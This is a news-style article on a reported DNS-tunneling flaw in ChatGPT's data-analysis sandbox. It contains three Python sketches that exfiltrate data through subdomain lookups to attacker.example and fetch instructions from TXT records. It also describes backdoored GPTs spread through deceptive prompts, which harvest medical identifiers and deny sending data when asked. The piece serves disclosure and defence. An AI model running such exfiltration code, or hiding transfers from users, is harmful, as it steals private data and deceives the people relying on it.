AI assistants are increasingly trusted with sensitive information, including personal medical and financial details. However, a recent discovery by Check Point Research revealed a severe vulnerability in ChatGPT, allowing attackers to stealthily access such data.
Understanding the ChatGPT Vulnerability
The vulnerability was rooted in ChatGPT’s Python-based Data Analysis environment, which OpenAI designed as a secure sandbox. From within that sandbox, attackers exploited a covert outbound channel to extract user data, including chat histories, uploaded files, and AI-generated outputs, without triggering alerts.
OpenAI blocks outbound HTTP requests from this environment to prevent data leakage, but attackers found a way around that restriction. Using DNS tunneling, they exploited the system’s DNS resolution capabilities to bypass the safeguards intended to restrict external data transfers.
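To make the gap concrete, a minimal Python probe along the following lines shows the asymmetry: direct HTTP egress from a locked-down sandbox fails, while a DNS lookup still leaves the environment. This is an illustrative sketch rather than the researchers’ code, and the domain attacker.example is a placeholder.

```python
import socket
import urllib.request

# Attempt direct HTTP egress: in a sandbox that blocks outbound HTTP,
# this request is expected to fail.
try:
    urllib.request.urlopen("http://attacker.example/", timeout=3)
    print("HTTP egress allowed")
except Exception as exc:
    print(f"HTTP egress blocked: {exc}")

# Attempt a DNS lookup: even if the name does not resolve, the query itself
# travels out to a resolver and, ultimately, to the domain's name server.
try:
    socket.gethostbyname("probe.attacker.example")
    print("DNS lookup resolved")
except socket.gaierror:
    print("DNS query sent (name did not resolve)")
```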
Exploiting DNS Tunneling
DNS tunneling became the attackers’ tool of choice, allowing them to encode sensitive information into DNS subdomains. This method transformed normal DNS lookups into a vehicle for data exfiltration, unnoticed by the security measures intended to prevent such breaches.
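In practice, tunneling data out this way amounts to packing the secret into hostname labels and issuing lookups against an attacker-controlled domain, whose authoritative name server logs every query it receives. The sketch below is a hypothetical illustration of the general technique, not the exploit itself; the domain and chunk size are assumptions.

```python
import base64
import socket

def exfiltrate_via_dns(secret: str, domain: str = "attacker.example") -> None:
    """Encode a secret into DNS subdomain labels and leak it via lookups."""
    # Base32 keeps labels alphanumeric and case-insensitive, which survives DNS.
    encoded = base64.b32encode(secret.encode()).decode().rstrip("=").lower()

    # Individual DNS labels are capped at 63 characters, so split into chunks.
    chunks = [encoded[i:i + 60] for i in range(0, len(encoded), 60)]

    for seq, chunk in enumerate(chunks):
        hostname = f"{seq}.{chunk}.{domain}"
        try:
            # The query itself carries the data to the attacker's name server;
            # whether the name actually resolves is irrelevant.
            socket.gethostbyname(hostname)
        except socket.gaierror:
            pass  # NXDOMAIN is expected once the query has gone out.

exfiltrate_via_dns("patient-id=12345; diagnosis=example")
```

Because each lookup looks like ordinary name resolution, controls that only inspect HTTP or other application-layer egress never see a transfer take place.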
With DNS traffic not treated as an external data transfer, attackers could relay harvested information directly to name servers under their control. The flaw extended beyond one-way data theft: the same channel could carry instructions back into the isolated environment, giving attackers a bidirectional link for remote command execution.
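The return path can be as simple as polling DNS records the attacker publishes, such as TXT records, and acting on whatever they contain. The following sketch assumes the third-party dnspython package is available, which is our assumption, and uses a placeholder domain; it illustrates the pattern rather than reproducing the actual attack.

```python
import dns.exception
import dns.resolver  # third-party "dnspython" package (assumed available)

def fetch_instruction(domain: str = "cmd.attacker.example") -> str | None:
    """Retrieve an attacker-published instruction from a TXT record."""
    try:
        answers = dns.resolver.resolve(domain, "TXT")
    except dns.exception.DNSException:
        return None  # nothing published, or DNS unreachable

    for record in answers:
        # TXT rdata arrives as a tuple of byte strings; join and decode them.
        return b"".join(record.strings).decode()
    return None

instruction = fetch_instruction()
if instruction:
    # In the scenario described above, the sandboxed code would act on this
    # string, completing the inbound half of the bidirectional channel.
    print("received instruction:", instruction)
```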
Impact and Response
Exploitation required minimal user interaction and was often initiated by a misleading prompt disguised as a productivity hack. Distributed across public platforms, these prompts turned innocent user interactions into data-collection channels, compromising both privacy and security.
Check Point Research highlighted that once a user engaged with a backdoored GPT, such as a simulated personal doctor, the system could extract and transmit sensitive identifiers. The attack was sophisticated enough to remain invisible to users, as the AI would deny making any external data transfers if queried.
Conclusion and Outlook
OpenAI addressed the issue by patching the vulnerability on February 20, 2026, effectively closing the DNS tunnel. This incident underscores the expanding attack surface of AI technologies as they grow in complexity.
The event serves as a critical reminder of the need for robust security measures in AI systems, advocating for continuous vigilance and improvements as these technologies evolve.
